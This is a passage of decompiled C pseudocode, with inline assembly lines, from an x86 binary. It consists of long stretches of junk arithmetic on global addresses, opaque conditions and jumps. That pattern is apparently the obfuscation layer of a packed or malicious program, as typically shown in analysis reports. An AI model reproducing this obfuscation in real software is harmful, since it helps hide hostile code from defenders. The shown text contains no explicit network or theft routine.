				asm("adc eax, [0x6e24b00c]");
				 *0x6e24b008 = _t1285 - 0xb401 +  *0x6e24b008 +  *0x6e24b008 +  *0x6e24b008;
				 *0x6e24b00c = 0;
				_v24 = 0x76;
				_v16 = 0;
				_v60 =  *((intOrPtr*)(0x6e24b058));
				if(_v60 == 1) {
					_t903 =  *0x6e24b000; // 0x565
					_t1291 =  *0x6e24b0d8; // 0xf1cde0
					_t92 = _t903 - 0xb401; // 0xf119df
					asm("adc ecx, [0x6e24b00c]");
					asm("adc ecx, [0x6e24b00c]");
					 *0x6e24b008 = _t1291 + _t92 +  *0x6e24b008 +  *0x6e24b008;
					 *0x6e24b00c = 0;
				} else {
					_t1575 =  *0x6e24b0d8; // 0xf1cde0
					 *0x6e24b008 = _t1575 + 5 -  *0x6e24b000;
					 *0x6e24b00c = 0;
				}
				_t905 =  *0x6e24b008; // 0xcac97647
				_t1292 =  *0x6e24b00c; // 0x0
				asm("adc edx, [0x6e24b00c]");
				asm("adc edx, eax");
				 *0x6e24b008 = _t905 +  *0x6e24b008 +  *0x6e24b0d8;
				 *0x6e24b00c = _t1292;
				_v232 = 0;
				_v12 = 3;
				while(_v12 < 0x18) {
					_t798 =  *0x6e24b0d8; // 0xf1cde0
					if(_t798 !=  *0x6EDF8BBD) {
						_t1190 =  *0x6e24b00c; // 0x0
						_t1572 =  *0x6e24b008; // 0xcac97647
						 *0x6e24b008 = E6E203D70(_t1572, _t1190,  *(0x6e24b010 + _v12 * 4), 0);
						 *0x6e24b00c = _t1572;
						_t801 =  *0x6e24b008; // 0xcac97647
						 *0x6e24b0d8 = _t801 + 5 -  *0x6e24b000;
						_v124 =  *0x6E24B038;
						_v120 = 0;
						_t1574 =  *0x6e24b008; // 0xcac97647
						__eflags = _t1574 - _v124;
						if(_t1574 != _v124) {
							L47:
							goto L40;
						} else {
							_t805 =  *0x6e24b00c; // 0x0
							__eflags = _t805 - _v120;
							if(_t805 != _v120) {
								goto L47;
							} else {
							}
						}
					} else {
						L40:
						_v12 = _v12 + 1;
						continue;
					}
					break;
				}
				_t1628 =  *0x6e24b0d8; // 0xf1cde0
				_t908 =  *0x6e24b00c; // 0x0
				_t1293 =  *0x6e24b008; // 0xcac97647
				_t472 = E6E203D70(_t1293, _t908, 0x2f, 0);
				asm("sbb edi, edx");
				 *0x6e24b008 = _t1628 - _t472;
				 *0x6e24b00c = 0;
				_v64 =  *((intOrPtr*)(0x6e24b058));
				__eflags = _v64 - 1;
				if(_v64 == 1) {
					_t474 = _v8 & 0x0000ffff;
					_t910 =  *0x6e24b0d8; // 0xf1cde0
					_t112 = _t474 - 0xb401; // 0xf119df
					 *0x6e24b0d4 = ( *0x6e24b0d4 & 0x000000ff) + _t910 + _t112 + ( *0x6e24b0d4 & 0x000000ff);
				} else {
					_t1566 =  *0x6e24b0d8; // 0xf1cde0
					_t1568 = _t1566 + 5 - (_v8 & 0x0000ffff);
					__eflags = _t1568;
					 *0x6e24b0d4 = _t1568;
				}
				_v33 = 1;
				__eflags =  *((intOrPtr*)(0x6e24b048)) +  *0x6EDF8BBD - 0x2af;
				if( *((intOrPtr*)(0x6e24b048)) +  *0x6EDF8BBD != 0x2af) {
					_t478 =  *0x6e24b000; // 0x565
					 *((intOrPtr*)(0x6e24b010)) = _t478 -  *0x6e24b0d8 * 0x2f;
					_t480 =  *0x6e24b0d8; // 0xf1cde0
					_t917 =  *0x6e24b0d8; // 0xf1cde0
					_t119 = _t480 - 0xb401; // 0xf119df
					asm("adc eax, [0x6e24b00c]");
					_t1302 = _t917 + _t119 +  *0x6e24b008 +  *0x6e24b008;
					__eflags = _t1302;
					asm("adc eax, [0x6e24b00c]");
					 *0x6e24b008 = _t1302;
					 *0x6e24b00c = 0;
				} else {
					_t1563 =  *0x6e24b008; // 0xcac97647
					 *0x6e24b0d8 = _t1563 - 0x18 +  *0x6e24b0d8;
					_t793 =  *0x6e24b0d8; // 0xf1cde0
					asm("adc ecx, [0x6e24b00c]");
					 *0x6e24b008 = _t793 - 0x48 -  *0x6e24b000 +  *0x6e24b008;
					 *0x6e24b00c = 0;
				}
				_t918 =  *0x6e24b008; // 0xcac97647
				_t1303 =  *0x6e24b00c; // 0x0
				asm("sbb edx, 0x0");
				asm("sbb edx, eax");
				asm("adc edx, [0x6e24b00c]");
				 *0x6e24b008 = _t918 - 0x48 -  *0x6e24b0d8 +  *0x6e24b008;
				 *0x6e24b00c = _t1303;
				__eflags =  *((intOrPtr*)(0x6e24b048)) +  *0x6EDF8BBD - 0x2af;
				if( *((intOrPtr*)(0x6e24b048)) +  *0x6EDF8BBD != 0x2af) {
					 *((intOrPtr*)(0x6e24b010)) = (_v8 & 0x0000ffff) -  *0x6e24b0d8 * 0x2f;
					_t926 =  *0x6e24b0d8; // 0xf1cde0
					_t1307 =  *0x6e24b0d8; // 0xf1cde0
					_t128 = _t926 - 0xb401; // 0xf119df
					_t1309 = ( *0x6e24b0d4 & 0x000000ff) + _t1307 + _t128 + ( *0x6e24b0d4 & 0x000000ff);
					__eflags = _t1309;
					 *0x6e24b0d4 = _t1309;
				} else {
					_t791 =  *0x6e24b0d8; // 0xf1cde0
					_t123 = _t791 - 0x18; // -24
					 *0x6e24b0d8 = ( *0x6e24b0d4 & 0x000000ff) + _t123;
					_t1560 =  *0x6e24b0d8; // 0xf1cde0
					 *0x6e24b0d4 = ( *0x6e24b0d4 & 0x000000ff) + _t1560 - 0x48 - (_v8 & 0x0000ffff);
				}
				while(1) {
					__eflags = 1;
					if(1 == 0) {
						break;
					}
					_t1121 =  *0x6e24b00c; // 0x0
					_t1499 =  *0x6e24b008; // 0xcac97647
					_t718 = E6E203D70(_t1499, _t1121, 0x268e, 0);
					asm("cdq");
					 *0x6e24b0d4 = _t718 + ( *0x6e24b0d4 & 0x000000ff);
					_t1500 =  *0x6e24b008; // 0xcac97647
					_t720 =  *0x6e24b00c; // 0x0
					asm("sbb eax, 0x0");
					asm("sbb eax, ecx");
					_t1503 = _t1500 - 0x48 -  *0x6e24b0d8 +  *0x6e24b008;
					asm("adc eax, [0x6e24b00c]");
					 *0x6e24b008 = _t1503;
					 *0x6e24b00c = _t720;
					asm("cdq");
					_v132 = _v8 & 0x0000ffff;
					_v128 = _t1503;
					_t1504 =  *0x6e24b00c; // 0x0
					__eflags = _t1504 - _v128;
					if(__eflags >= 0) {
						if(__eflags > 0) {
							L62:
							_t1174 =  *0x6e24b008; // 0xcac97647
							 *0x6e24b000 = _t1174 - 0x18 +  *0x6e24b0d8;
							_t1547 =  *0x6e24b008; // 0xcac97647
							_t777 =  *0x6e24b00c; // 0x0
							asm("adc eax, 0x0");
							asm("sbb eax, ecx");
							 *0x6e24b008 = _t1547 + 5 -  *0x6e24b0d8;
							 *0x6e24b00c = _t777;
							_t1178 =  *0x6e24b008; // 0xcac97647
							asm("cdq");
							_t1550 =  *0x6e24b0d0; // 0x38c975ff
							 *0x6e24b0d0 = _t1550 - _t1178 + 2 + ( *0x6e24b0d4 & 0x000000ff);
							__eflags = _v8 & 0x0000ffff;
							if((_v8 & 0x0000ffff) != 0) {
								_v44 = 0;
							} else {
								_v44 = 1;
							}
							 *0x6e24b0d0 = _v44;
							__eflags =  *0x6e24b0d0;
							if( *0x6e24b0d0 != 0) {
								asm("cdq");
								_t1553 =  *0x6e24b0d0; // 0x38c975ff
								 *0x6e24b0d0 = _t1553 + ( *0x6e24b0d4 & 0x000000ff) - 0x48 -  *0x6e24b008;
								_v68 =  *((intOrPtr*)(0x6e24b058));
								__eflags = _v68 - 1;
								if(_v68 == 1) {
									_t786 =  *0x6e24b0d8; // 0xf1cde0
									_t1184 =  *0x6e24b000; // 0x565
									_t142 = _t786 - 0xb401; // -44700
									 *0x6e24b0d0 = _t1184 + _t142 +  *0x6e24b0d0 +  *0x6e24b0d0;
								} else {
									_t787 =  *0x6e24b000; // 0x565
									_t789 = _t787 + 5 -  *0x6e24b0d8;
									__eflags = _t789;
									 *0x6e24b0d0 = _t789;
								}
							}
							_t780 =  *0x6e24b000; // 0x565
							_t781 = _t780 - (_v8 & 0x0000ffff) * 0x2f;
							__eflags = _t781;
							 *0x6e24b0d0 = _t781;
						} else {
							_t790 =  *0x6e24b008; // 0xcac97647
							__eflags = _t790 - _v132;
							if(_t790 > _v132) {
								goto L62;
							}
						}
					}
					_t1125 =  *0x6e24b008; // 0xcac97647
					_t1505 =  *0x6e24b00c; // 0x0
					asm("adc edx, [0x6e24b00c]");
					asm("adc edx, eax");
					 *0x6e24b008 = _t1125 +  *0x6e24b008 +  *0x6e24b0d8;
					 *0x6e24b00c = _t1505;
					_t1128 =  *0x6e24b008; // 0xcac97647
					asm("cdq");
					_t1506 =  *0x6e24b0d0; // 0x38c975ff
					 *0x6e24b0d0 = _t1506 + _t1128 - 0xb401 + ( *0x6e24b0d4 & 0x000000ff) +  *0x6e24b0d0;
					_t724 =  *0x6e24b0d0; // 0x38c975ff
					_v140 = _t724;
					_v136 = 0;
					__eflags = _v136 -  *0x6e24b00c; // 0x0
					if(__eflags > 0) {
						L75:
						_t1509 =  *0x6e24b0d0; // 0x38c975ff
						__eflags = _t1509 -  *0x6e24b0d8; // 0xf1cde0
						if(__eflags >= 0) {
							_t763 =  *0x6e24b0d0; // 0x38c975ff
							 *0x6e24b0d8 = _t763 + 5 - (_v8 & 0x0000ffff);
							 *0x6EDF8BBD =  *0x6EDF8BBD - (_v8 & 0x0000ffff);
							_t767 =  *0x6e24b0d0; // 0x38c975ff
							_t769 = _t767 + 5 - (_v8 & 0x0000ffff);
							__eflags = _t769;
							 *0x6e24b0d8 = _t769;
						}
					} else {
						if(__eflags < 0) {
							L74:
							_t1170 =  *0x6e24b00c; // 0x0
							_t1543 =  *0x6e24b008; // 0xcac97647
							_t770 = E6E203D70(_t1543, _t1170, 0x268e, 0);
							asm("cdq");
							 *0x6e24b0d4 = _t770 + ( *0x6e24b0d4 & 0x000000ff);
							_t1544 =  *0x6e24b008; // 0xcac97647
							_t772 =  *0x6e24b00c; // 0x0
							asm("adc eax, 0x0");
							asm("sbb eax, ecx");
							 *0x6e24b008 = _t1544 + 1 -  *0x6e24b0d8;
							 *0x6e24b00c = _t772;
							asm("cdq");
							 *0x6e24b0d0 = ( *0x6e24b0d4 & 0x000000ff) + 1 -  *0x6e24b008;
						} else {
							__eflags = _v140 -  *0x6e24b008; // 0xcac97647
							if(__eflags >= 0) {
								goto L75;
							} else {
								goto L74;
							}
						}
					}
					__eflags = _v20 - 1;
					if(_v20 >= 1) {
						_t1641 =  *0x6e24b0d8; // 0xf1cde0
						_t1510 =  *0x6e24b00c; // 0x0
						_t725 =  *0x6e24b008; // 0xcac97647
						_t726 = E6E203D70(_t725, _t1510, 0x2f, 0);
						asm("sbb edi, edx");
						 *0x6e24b008 = _t1641 - _t726;
						 *0x6e24b00c = 0;
						asm("cdq");
						_t1133 =  *0x6e24b0d0; // 0x38c975ff
						 *0x6e24b0d0 = _t1133 + ( *0x6e24b0d4 & 0x000000ff) - 0x48 -  *0x6e24b008;
						E6E1FB530();
						__eflags =  *0x6e24b0d0 - ( *0x6e24b0d4 & 0x000000ff); // 0x38c975ff
						if(__eflags >= 0) {
							_t742 =  *0x6e24b0d0; // 0x38c975ff
							 *0x6e24b0d4 = _t742 + 5 -  *0x6e24b008;
							 *0x6EDF8BBD =  *0x6EDF8BBD -  *0x6e24b008;
							_t1145 =  *0x6e24b0d0; // 0x38c975ff
							_t1147 = _t1145 + 5 -  *0x6e24b008;
							__eflags = _t1147;
							 *0x6e24b0d4 = _t1147;
						}
						_t1512 =  *0x6e24b008; // 0xcac97647
						_t731 =  *0x6e24b00c; // 0x0
						asm("adc eax, 0x0");
						asm("sbb eax, ecx");
						 *0x6e24b008 = _t1512 + 1 -  *0x6e24b0d8;
						 *0x6e24b00c = _t731;
						_t1515 =  *0x6e24b0d0; // 0x38c975ff
						 *0x6e24b0d4 = _t1515 + 5 -  *0x6e24b008;
						_v20 = _v20 - 1;
						 *0x6e24b0d0 = (_v8 & 0x0000ffff) - 0x48 -  *0x6e24b000 +  *0x6e24b0d0;
						_t1518 =  *0x6e24b0d0; // 0x38c975ff
						_v8 = _t1518 + 5 -  *0x6e24b0d8;
						_v72 =  *((intOrPtr*)(0x6e24b058));
						__eflags = _v72 - 1;
						if(_v72 == 1) {
							asm("cdq");
							_t1141 =  *0x6e24b0d0; // 0x38c975ff
							 *0x6e24b0d0 = _t1141 + ( *0x6e24b0d4 & 0x000000ff) - 0xb401 +  *0x6e24b008 +  *0x6e24b0d0;
						} else {
							asm("cdq");
							_t741 = ( *0x6e24b0d4 & 0x000000ff) + 5 -  *0x6e24b008;
							__eflags = _t741;
							 *0x6e24b0d0 = _t741;
						}
						continue;
					} else {
						_t1524 =  *0x6e24b0d0; // 0x38c975ff
						 *0x6e24b0d4 = _t1524 + 5 -  *0x6e24b008;
						_t747 =  *0x6e24b0d0; // 0x38c975ff
						_v148 = _t747;
						_v144 = 0;
						__eflags = _v144 -  *0x6e24b00c; // 0x0
						if(__eflags >= 0) {
							if(__eflags > 0) {
								L81:
								_t1160 =  *0x6e24b00c; // 0x0
								_t1537 =  *0x6e24b008; // 0xcac97647
								_t758 = E6E203D70(_t1537, _t1160, 0x268e, 0);
								asm("cdq");
								 *0x6e24b0d4 = _t758 + ( *0x6e24b0d4 & 0x000000ff);
								_t1643 =  *0x6e24b0d8; // 0xf1cde0
								_t1538 =  *0x6e24b00c; // 0x0
								_t760 =  *0x6e24b008; // 0xcac97647
								_t761 = E6E203D70(_t760, _t1538, 0x2f, 0);
								asm("sbb edi, edx");
								 *0x6e24b008 = _t1643 - _t761;
								 *0x6e24b00c = 0;
								_t1163 =  *0x6e24b0d0; // 0x38c975ff
								_t1165 = _t1163 + 5 -  *0x6e24b008;
								__eflags = _t1165;
								 *0x6e24b0d4 = _t1165;
							} else {
								__eflags = _v148 -  *0x6e24b008; // 0xcac97647
								if(__eflags > 0) {
									goto L81;
								}
							}
						}
						__eflags =  *((intOrPtr*)(0x6e24b048)) +  *0x6EDF8BBD - 0x2af;
						if( *((intOrPtr*)(0x6e24b048)) +  *0x6EDF8BBD != 0x2af) {
							_t1151 =  *0x6e24b000; // 0x565
							 *((intOrPtr*)(0x6e24b010)) = _t1151 -  *0x6e24b0d8 * 0x2f;
							_t1153 =  *0x6e24b0d8; // 0xf1cde0
							_t1532 =  *0x6e24b0d8; // 0xf1cde0
							_t162 = _t1153 - 0xb401; // 0xf119df
							asm("adc ecx, [0x6e24b00c]");
							_t753 = _t1532 + _t162 +  *0x6e24b008 +  *0x6e24b008;
							__eflags = _t753;
							asm("adc ecx, [0x6e24b00c]");
							 *0x6e24b008 = _t753;
							 *0x6e24b00c = 0;
						} else {
							_t755 =  *0x6e24b008; // 0xcac97647
							 *0x6e24b0d8 = _t755 - 0x18 +  *0x6e24b0d8;
							_t1156 =  *0x6e24b0d8; // 0xf1cde0
							asm("adc edx, [0x6e24b00c]");
							 *0x6e24b008 = _t1156 - 0x48 -  *0x6e24b000 +  *0x6e24b008;
							 *0x6e24b00c = 0;
						}
						_t1533 =  *0x6e24b008; // 0xcac97647
						_t754 =  *0x6e24b00c; // 0x0
						asm("adc eax, 0x0");
						asm("sbb eax, ecx");
						 *0x6e24b008 = _t1533 + 1 -  *0x6e24b0d8;
						 *0x6e24b00c = _t754;
					}
					break;
				}
				_v20 = 0x147042e;
				_v12 = 0x1b;
				while(1) {
					__eflags = _v12 - 1;
					if(_v12 <= 1) {
						break;
					}
					_t710 =  *0x6e24b000; // 0x565
					_v156 = _t710;
					_v152 = 0;
					_v48 = 0x28;
					_t711 = _v48;
					__eflags = _v156 -  *((intOrPtr*)(_t711 + 0x6e24b050));
					if(_v156 !=  *((intOrPtr*)(_t711 + 0x6e24b050))) {
						L99:
						asm("adc edx, [0x6e24b00c]");
						 *0x6e24b008 = ( *0x6e24b0d4 & 0x000000ff) - 0x48 -  *0x6e24b000 +  *0x6e24b008;
						 *0x6e24b00c = 0;
						_t712 =  *0x6e24b000; // 0x565
						asm("adc ecx, [edx*8+0x6e24b054]");
						_t1495 = _v12;
						 *((intOrPtr*)(0x6e24b050 + _t1495 * 8)) = _t712 +  *((intOrPtr*)(0x6e24b050 + _v12 * 8));
						 *((intOrPtr*)(0x6e24b054 + _t1495 * 8)) = 0;
						_t714 =  *0x6e24b008; // 0xcac97647
						 *0x6e24b0d4 = _t714 + 5 -  *0x6e24b000;
						goto L94;
					} else {
						_t1498 = _v48;
						__eflags = _v152 -  *((intOrPtr*)(_t1498 + 0x6e24b054));
						if(_v152 !=  *((intOrPtr*)(_t1498 + 0x6e24b054))) {
							goto L99;
						} else {
							L94:
							_t1497 = _v12 - 1;
							__eflags = _t1497;
							_v12 = _t1497;
							continue;
						}
					}
					break;
				}
				asm("cdq");
				_t928 =  *0x6e24b0d0; // 0x38c975ff
				 *0x6e24b0d0 = _t928 + ( *0x6e24b0d4 & 0x000000ff) - 0x48 -  *0x6e24b008;
				__eflags =  *0x6e24b0d8 - (_v8 & 0x0000ffff); // 0xf1cde0
				if(__eflags >= 0) {
					_t705 =  *0x6e24b0d8; // 0xf1cde0
					_v8 = _t705 + 5 -  *0x6e24b0d0;
					 *0x6EDF8BBD =  *0x6EDF8BBD -  *0x6e24b0d0;
					_t1111 =  *0x6e24b0d8; // 0xf1cde0
					_t1113 = _t1111 + 5 -  *0x6e24b0d0;
					__eflags = _t1113;
					_v8 = _t1113;
				}
				asm("adc eax, [ecx+0x6e24b054]"); // 0xa8cd6f4a
				_v164 =  *0x6E24B0C0 +  *((intOrPtr*)(0x6edf8bfd));
				_v160 =  *((intOrPtr*)(0x6e24b0c4));
				__eflags = _v164 - 0x2af;
				if(_v164 != 0x2af) {
					L105:
					_t495 =  *0x6e24b0d0; // 0x38c975ff
					 *((intOrPtr*)(0x6e24b058)) = _t495 - ( *0x6e24b0d4 & 0x000000ff) * 0x2f;
					 *0x6E24B05C = 0;
					asm("cdq");
					asm("adc edx, [0x6e24b00c]");
					_t500 = ( *0x6e24b0d4 & 0x000000ff) + ( *0x6e24b0d4 & 0x000000ff) - 0xb401 +  *0x6e24b008 +  *0x6e24b008;
					__eflags = _t500;
					asm("adc edx, [0x6e24b00c]");
					 *0x6e24b008 = _t500;
					 *0x6e24b00c = 0;
				} else {
					__eflags = _v160;
					if(_v160 != 0) {
						goto L105;
					} else {
						_t1106 =  *0x6e24b008; // 0xcac97647
						asm("cdq");
						 *0x6e24b0d4 = _t1106 - 0x18 + ( *0x6e24b0d4 & 0x000000ff);
						asm("adc eax, [0x6e24b00c]");
						 *0x6e24b008 = ( *0x6e24b0d4 & 0x000000ff) - 0x48 -  *0x6e24b0d0 +  *0x6e24b008;
						 *0x6e24b00c = 0;
					}
				}
				 *0x6e24b0d0 = 0x6e1785c4 +  *0x6e24b0d0;
				asm("cdq");
				_t503 = ( *0x6e24b0d4 & 0x000000ff) + 1 -  *0x6e24b008;
				__eflags = _t503;
				 *0x6e24b000 = _t503;
				while(1) {
					__eflags = 1;
					if(1 == 0) {
						break;
					}
					_v16 = _v16 + 1;
					_t1351 = (_v8 & 0x0000ffff) +  *0x6e24b0d0;
					_t538 =  *0x6e24b0d8; // 0xf1cde0
					_t214 = _t1351 - 0xb401; // 0xf119df
					 *0x6e24b0d0 = _t538 + _t214 +  *0x6e24b0d0;
					_v172 =  *((intOrPtr*)(0x6e24b024));
					_v168 = 0;
					__eflags = _v168 -  *0x6e24b00c; // 0x0
					if(__eflags <= 0) {
						if(__eflags < 0) {
							L111:
							 *0x6EDF8BBD =  *0x6e24b0d4 & 0x000000ff;
							_t1099 =  *0x6e24b008; // 0xcac97647
							asm("cdq");
							_t1481 =  *0x6e24b0d0; // 0x38c975ff
							 *0x6e24b0d0 = _t1481 + _t1099 - 0xb401 + ( *0x6e24b0d4 & 0x000000ff) +  *0x6e24b0d0;
							asm("cdq");
							_t1103 =  *0x6e24b008; // 0xcac97647
							 *0x6e24b0d0 = _t1103 - ( *0x6e24b0d4 & 0x000000ff) * 0x2f;
							asm("cdq");
							_t1483 =  *0x6e24b0d0; // 0x38c975ff
							_t1484 = _t1483 + ( *0x6e24b0d4 & 0x000000ff) - 0x48 -  *0x6e24b008;
							__eflags = _t1484;
							 *0x6e24b0d0 = _t1484;
						} else {
							__eflags = _v172 -  *0x6e24b008; // 0xcac97647
							if(__eflags <= 0) {
								goto L111;
							}
						}
					}
					__eflags =  *0x6e24b0d0 - 0x10edd;
					if( *0x6e24b0d0 > 0x10edd) {
						_v8 =  *0x6e24b0d8 * 0x268e + (_v8 & 0x0000ffff);
						__eflags =  *0x6E24B054 - 0x170c;
						if( *0x6E24B054 == 0x170c) {
							 *0x6e24b0d4 = ( *0x6e24b0d4 & 0x000000ff) +  *((intOrPtr*)(0x6e24b024));
							_t1098 = ( *0x6e24b0d4 & 0x000000ff) + 1 - ( *0x6e24b0d4 & 0x000000ff);
							__eflags = _t1098;
							 *0x6e24b0d0 = _t1098;
						}
					}
					__eflags =  *((intOrPtr*)(0x6e24b048)) +  *0x6EDF8BBD - 0x2af;
					if( *((intOrPtr*)(0x6e24b048)) +  *0x6EDF8BBD != 0x2af) {
						_t1633 =  *0x6e24b0d8; // 0xf1cde0
						_t1356 =  *0x6e24b00c; // 0x0
						_t544 =  *0x6e24b008; // 0xcac97647
						 *((intOrPtr*)(0x6e24b010)) = _t1633 - E6E203D70(_t544, _t1356, 0x2f, 0);
						_t546 =  *0x6e24b008; // 0xcac97647
						_t971 =  *0x6e24b0d0; // 0x38c975ff
						_t972 = _t971 + _t546 - 0xb401 +  *0x6e24b008 +  *0x6e24b0d0;
						__eflags = _t972;
						 *0x6e24b0d0 = _t972;
					} else {
						_t1089 =  *0x6e24b0d0; // 0x38c975ff
						asm("adc edx, [0x6e24b00c]");
						 *0x6e24b008 = _t1089 - 0x18 +  *0x6e24b008;
						 *0x6e24b00c = 0;
						_t687 =  *0x6e24b008; // 0xcac97647
						_t1092 =  *0x6e24b0d0; // 0x38c975ff
						 *0x6e24b0d0 = _t1092 + _t687 - 0x48 -  *0x6e24b0d8;
					}
					__eflags = _v16 - 0x54;
					if(_v16 < 0x54) {
						__eflags =  *((intOrPtr*)(0x6e24b024)) - _v16;
						if( *((intOrPtr*)(0x6e24b024)) <= _v16) {
							 *0x6EDF8BBD =  *0x6e24b0d4 & 0x000000ff;
							_t1087 =  *0x6e24b0d4 & 0x000000ff;
							_t1475 = _v16;
							_t234 = _t1087 - 0xb401; // -45997
							asm("cdq");
							asm("adc edx, [0x6e24b00c]");
							asm("adc edx, [0x6e24b00c]");
							 *0x6e24b008 = _t1475 + _t234 +  *0x6e24b008 +  *0x6e24b008;
							 *0x6e24b00c = _t1475;
							asm("cdq");
							 *0x6e24b008 = _v16 - ( *0x6e24b0d4 & 0x000000ff) * 0x2f;
							 *0x6e24b00c = _t1475;
							asm("cdq");
							_t686 = ( *0x6e24b0d4 & 0x000000ff) - 0x48 - _v16 +  *0x6e24b008;
							__eflags = _t686;
							asm("adc edx, [0x6e24b00c]");
							 *0x6e24b008 = _t686;
							 *0x6e24b00c = _t1475;
						}
						_t1467 = (_v8 & 0x0000ffff) +  *0x6e24b0d0;
						_t668 =  *0x6e24b0d8; // 0xf1cde0
						_t239 = _t1467 - 0xb401; // 0xf119df
						 *0x6e24b0d0 = _t668 + _t239 +  *0x6e24b0d0;
						_t1471 = (_v8 & 0x0000ffff) - 0x48 -  *0x6e24b0d8 +  *0x6e24b0d0;
						 *0x6e24b0d0 = _t1471;
						asm("cdq");
						_v180 =  *0x6e24b0d4 & 0x000000ff;
						_v176 = _t1471;
						_t670 =  *0x6e24b00c; // 0x0
						__eflags = _t670 - _v176;
						if(__eflags >= 0) {
							if(__eflags > 0) {
								L124:
								_t1078 =  *0x6e24b008; // 0xcac97647
								asm("cdq");
								 *0x6e24b0d4 = _t1078 + 5 - _v16;
								 *0x6EDF8BBD =  *0x6EDF8BBD - _v16;
								_t1083 =  *0x6e24b008; // 0xcac97647
								asm("cdq");
								_t1085 = _t1083 + 5 - _v16;
								__eflags = _t1085;
								 *0x6e24b0d4 = _t1085;
							} else {
								_t1086 =  *0x6e24b008; // 0xcac97647
								__eflags = _t1086 - _v180;
								if(_t1086 >= _v180) {
									goto L124;
								}
							}
						}
					}
					__eflags =  *((intOrPtr*)(0x6e24b048)) +  *0x6EDF8BBD - 0x2af;
					if( *((intOrPtr*)(0x6e24b048)) +  *0x6EDF8BBD != 0x2af) {
						_t1361 =  *0x6e24b0d8; // 0xf1cde0
						 *((intOrPtr*)(0x6e24b010)) = _t1361 -  *0x6e24b000 * 0x2f;
						_t1363 =  *0x6e24b000; // 0x565
						_t552 =  *0x6e24b000; // 0x565
						_t256 = _t1363 - 0xb401; // -44700
						_t979 = _t552 + _t256 +  *0x6e24b0d0 +  *0x6e24b0d0;
						__eflags = _t979;
						 *0x6e24b0d0 = _t979;
					} else {
						_t662 =  *0x6e24b000; // 0x565
						_t1074 =  *0x6e24b0d0; // 0x38c975ff
						_t253 = _t662 - 0x18; // 0x38c975e7
						 *0x6e24b000 = _t1074 + _t253;
						_t663 =  *0x6e24b000; // 0x565
						 *0x6e24b0d0 = _t663 - 0x48 -  *0x6e24b0d8 +  *0x6e24b0d0;
					}
					_v8 =  *0x6e24b0d8 * 0x268e + (_v8 & 0x0000ffff);
					__eflags =  *((intOrPtr*)(0x6e24b054)) - 0x170c;
					if( *((intOrPtr*)(0x6e24b054)) == 0x170c) {
						 *0x6e24b0d4 = ( *0x6e24b0d4 & 0x000000ff) +  *((intOrPtr*)(0x6e24b024));
						_t661 = ( *0x6e24b0d4 & 0x000000ff) + 1 - ( *0x6e24b0d4 & 0x000000ff);
						__eflags = _t661;
						 *0x6e24b0d0 = _t661;
					}
					__eflags = _v32 - 6;
					if(_v32 < 6) {
						_t1459 =  *0x6e24b0d8; // 0xf1cde0
						_t653 =  *0x6e24b0d0; // 0x38c975ff
						_t263 = _t1459 - 0x18; // 0x38c975e7
						_v8 = _t653 + _t263;
						_v32 = _v32 - 1;
						_t657 = (_v8 & 0x0000ffff) - 0x48 - _v32 +  *0x6e24b000;
						__eflags = _t657;
						 *0x6e24b000 = _t657;
					}
					_t981 =  *0x6e24b0d0; // 0x38c975ff
					_v8 = _t981 + 5 -  *0x6e24b0d8;
					__eflags =  *((intOrPtr*)(0x6e24b048)) +  *0x6EDF8BBD - 0x2af;
					if( *((intOrPtr*)(0x6e24b048)) +  *0x6EDF8BBD != 0x2af) {
						_t1635 =  *0x6e24b0d8; // 0xf1cde0
						_t986 =  *0x6e24b00c; // 0x0
						_t1370 =  *0x6e24b008; // 0xcac97647
						 *((intOrPtr*)(0x6e24b010)) = _t1635 - E6E203D70(_t1370, _t986, 0x2f, 0);
						_t1371 =  *0x6e24b008; // 0xcac97647
						_t557 =  *0x6e24b0d0; // 0x38c975ff
						_t558 = _t557 + _t1371 - 0xb401 +  *0x6e24b008 +  *0x6e24b0d0;
						__eflags = _t558;
						 *0x6e24b0d0 = _t558;
					} else {
						_t648 =  *0x6e24b0d0; // 0x38c975ff
						asm("adc ecx, [0x6e24b00c]");
						 *0x6e24b008 = _t648 - 0x18 +  *0x6e24b008;
						 *0x6e24b00c = 0;
						_t1456 =  *0x6e24b008; // 0xcac97647
						_t651 =  *0x6e24b0d0; // 0x38c975ff
						 *0x6e24b0d0 = _t651 + _t1456 - 0x48 -  *0x6e24b0d8;
					}
					_v8 = (_v8 & 0x0000ffff) +  *0x6e24b000 + _v24;
					__eflags = (_v8 & 0x0000ffff) - 0x14d4b;
					if((_v8 & 0x0000ffff) > 0x14d4b) {
						_t1439 =  *0x6e24b0d8; // 0xf1cde0
						 *0x6e24b0d0 = _t1439 - (_v8 & 0x0000ffff) * 0x2f;
						_t627 =  *0x6e24b000; // 0x565
						_v188 = _t627;
						_v184 = 0;
						__eflags = _v188 -  *0x6e24b008; // 0xcac97647
						if(__eflags == 0) {
							__eflags = _v184 -  *0x6e24b00c; // 0x0
							if(__eflags == 0) {
								_t636 = E6E1F6B70(_v8 & 0x0000ffff);
								_t1652 = _t1652 + 4;
								 *0x6e24b0d0 = _t636;
								_t1449 =  *0x6e24b0d8; // 0xf1cde0
								_v196 = _t1449;
								_v192 = 0;
								__eflags = _v192 -  *0x6e24b00c; // 0x0
								if(__eflags >= 0) {
									if(__eflags > 0) {
										L141:
										_t640 =  *0x6e24b0d8; // 0xf1cde0
										 *0x6e24b008 = _t640 + 5 - ( *0x6e24b0d4 & 0x000000ff);
										 *0x6e24b00c = 0;
										 *0x6EDF8BBD =  *0x6EDF8BBD - ( *0x6e24b0d4 & 0x000000ff);
										_t1067 =  *0x6e24b0d8; // 0xf1cde0
										__eflags = 0;
										 *0x6e24b008 = _t1067 + 5 - ( *0x6e24b0d4 & 0x000000ff);
										 *0x6e24b00c = 0;
									} else {
										__eflags = _v196 -  *0x6e24b008; // 0xcac97647
										if(__eflags >= 0) {
											goto L141;
										}
									}
								}
								_t1062 =  *0x6e24b00c; // 0x0
								_t1450 =  *0x6e24b008; // 0xcac97647
								_t638 = E6E203D70(_t1450, _t1062, 0x268e, 0);
								asm("cdq");
								_t1064 = _t638 + ( *0x6e24b0d4 & 0x000000ff);
								__eflags = _t1064;
								 *0x6e24b0d4 = _t1064;
							}
						}
						__eflags =  *((intOrPtr*)(0x6e24b024)) -  *0x6e24b0d8; // 0xf1cde0
						if(__eflags <= 0) {
							_t1443 =  *0x6e24b008; // 0xcac97647
							 *0x6EDF8BBD = _t1443;
							_t1055 =  *0x6e24b0d8; // 0xf1cde0
							_t1444 =  *0x6e24b0d0; // 0x38c975ff
